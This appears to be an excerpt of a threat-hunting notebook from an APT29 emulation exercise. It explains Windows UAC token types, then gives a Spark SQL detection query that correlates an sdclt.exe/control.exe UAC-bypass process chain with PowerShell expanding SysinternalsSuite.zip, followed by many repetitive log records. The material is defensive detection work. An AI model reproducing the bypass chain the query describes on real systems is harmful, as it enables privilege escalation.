Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 

4.A.3. Deobfuscate/Decode Files or Information

Procedure: Decompressed ZIP (SysinternalsSuite.zip) file using PowerShell

Criteria: powershell.exe executing Expand-Archive

Detection Type:Telemetry(Correlated)

Query ID:66B068A4-C3AB-4973-AE07-2C15AFF78104

df = spark.sql(
'''
SELECT Payload
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessId
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
    AND f.EventID = 4103
    AND LOWER(f.Payload) LIKE "%expand-archive%"

'''
)
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Expand-Archive): "Expand-Archive"
ParameterBinding(Expand-Archive): name="LiteralPath"; value="C:\Users\pbeesly\Downloads\SysinternalsSuite.zip"
ParameterBinding(Expand-Archive): name="DestinationPath"; value="C:\Users\pbeesly\Downloads\"
ParameterBinding(Expand-Archive): name="Path"; value=""
ParameterBinding(Expand-Archive): name="Force"; value="False"
                                                                                                                                                                                                                                     
-RECORD 1-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Completed"; value="True"
                                                                                                                                                                                                                                                                                                                                                                                                                               
-RECORD 2-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="308"
 
-RECORD 3-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="100"
                                                                                                                                                                                                                                                                
-RECORD 4-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="307"
 
-RECORD 5-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="100"
                                                                                                                                                                                                                                                                
-RECORD 6-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="306"
 
-RECORD 7-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 8-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="305"
 
-RECORD 9-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 10----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="304"
 
-RECORD 11----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="99"
                                                                                                                                                                                                                                                                 
-RECORD 12----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="303"
 
-RECORD 13----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 14----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="302"
 
-RECORD 15----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 16----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="301"
 
-RECORD 17----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="98"
                                                                                                                                                                                                                                                                 
-RECORD 18----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="300"
 
-RECORD 19----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 20----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="299"
 
-RECORD 21----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 22----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="298"
 
-RECORD 23----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="97"
                                                                                                                                                                                                                                                                 
-RECORD 24----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="297"
 
-RECORD 25----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 26----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="296"
 
-RECORD 27----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 28----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="295"
 
-RECORD 29----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="96"
                                                                                                                                                                                                                                                                 
-RECORD 30----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="294"
 
-RECORD 31----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 32----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="293"
 
-RECORD 33----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 34----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="292"
 
-RECORD 35----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="95"
                                                                                                                                                                                                                                                                 
-RECORD 36----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="291"
 
-RECORD 37----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 38----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="290"
 
-RECORD 39----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 40----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="289"
 
